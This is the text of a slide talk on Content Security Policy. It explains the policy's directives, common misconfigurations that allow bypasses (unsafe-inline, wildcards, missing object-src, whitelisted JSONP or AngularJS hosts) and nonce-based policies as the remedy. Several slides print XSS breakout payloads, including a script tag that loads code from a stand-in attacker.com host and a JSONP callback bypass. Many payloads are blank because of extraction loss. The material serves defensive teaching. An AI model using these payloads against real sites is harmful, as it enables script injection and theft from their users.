Saturday day live with CSP by Artur Hil 

What the hell is this? Content Security Policy (CSP) is a computer security standard introduced to prevent cross-site scripting (XSS), clickjacking and other code injection attacks resulting from execution of malicious content in the trusted web page context. 

Yay! We don’t need any input validation now! to prevent XSS clickjacking code injection attacks 

Actually, NO CSP provides a standard method for website owners to declare approved origins of content that browsers should be allowed to load on that website 

Ambitious goals of CSP Mitigate risk Control over resources Control over execution Reduce privilege of the application Content is forced into a unique origin Detect exploitation by monitoring violations Collecting violating reports 

CSP directives… Many for many different problems media-src base-uri font-src plugin-types connect-src base-uri style-src script-src child-src report-to navigate-to form-action sandbox script-src-elem prefetch-src worker-src 

How it’s look like Bad example: 

How it’s look like Good example: 

How does it work? example.com CSP default-src ‘self’; script-src ‘self’ good.com; report-uri /csp_alert_logger; example.com good.com 

How does it work? example.com CSP default-src ‘self’; script-src ‘self’ good.com; report-uri /csp_alert_logger; example.com good.com “>’><script src=” //attacker.com/evil.js”> “>’><script>alert(balalaya) example.com/csp_alert_logger source not whitelisted inline scripts are not allowed 

I deployed CSP! Now I’m in safe! Not exactly, trivial mistake #1 script-src ‘self’ ‘unsafe-inline’; object-src ‘none’; ‘unsafe-inline’ in script-src instead of ‘nonce’ Same for ‘default-src’ if script-src directive is not set “>’> alert(12345) Bypass: 

I deployed CSP! Now I’m in safe! Not exactly trivial mistake #2 script-src ‘self’ https: data: *; object-src ‘none’; URL shhemes or wildcard in script-src instead of ‘unsafe-dynamic’ Same for URL schemes and wildcard in ‘object-src’ “>’> Bypass: “>’> 

I deployed CSP! Now I’m in safe! Not exactly trivial mistake #3 script-src ‘self’; Look’s secure, but… Missing object-src or default-src directive “>’> Bypass: 

I deployed CSP! Now I’m in safe! Not exactly trivial mistake #4 script-src ‘self’; object-src ‘none’; Allow ‘self’ + hosting use-provided content on the name origin Same for object-src or default-src directive “>’> Bypass: 

Whitelisting JSONP is a problem script-src ‘self’ https://whitelisted.com; object-src ‘none’; JSONP-like endpoint in whitelist “>’> Bypass: 

Whitelisting JSONP is a problem CSP script-src ‘self’ https://whitelisted.com; object-src ‘none’; alert(12345);u({...}) x.click({...}) “>’> “>’><script src=”https://whitelisted.com /jsonp?callback=x.click”> Bypass: Don't whitelist JSONP endpoints! 

Angular JS library in Whitelist script-src ‘self’ https://whitelisted.com; object-src ‘none’; “>’> “>’>

How to make safe CSP https://csp-evaluator.withgoogle.com/ 

How to make safe CSP https://cspvalidator.org 

Best way to make CSP safe script-src ‘nonce-r4nd0m123’ object-src ‘none’; Benefits: All tags with correct nonce attribute will be executed <script> tags injected via XSS will be blocked because of missing nonce No host/path whitelists! --> NO BYPASSES 

How does nonce work? example.com CSP default-src ‘self’; script-src ‘self’ nonce-r4and0m123; report-uri /csp_alert_logger; example.com good.com “>’><script src=” //attacker.com/evil.js”> “>’><script>alert(balalaya) example.com/csp_alert_logger script without correct nonce 

How it’s look like Good example: 

A New way to make CSP script-src ‘nonce-r4nd0m123’ ‘unsafe-dynamic’; object-src ‘none’; ● nonce-r4nd0m - Allows all scripts to execute if the correct nonce is set. ● unsafe-dynamic - Propagates trust and discards whitelists CSP V.3 

QUESTIONS?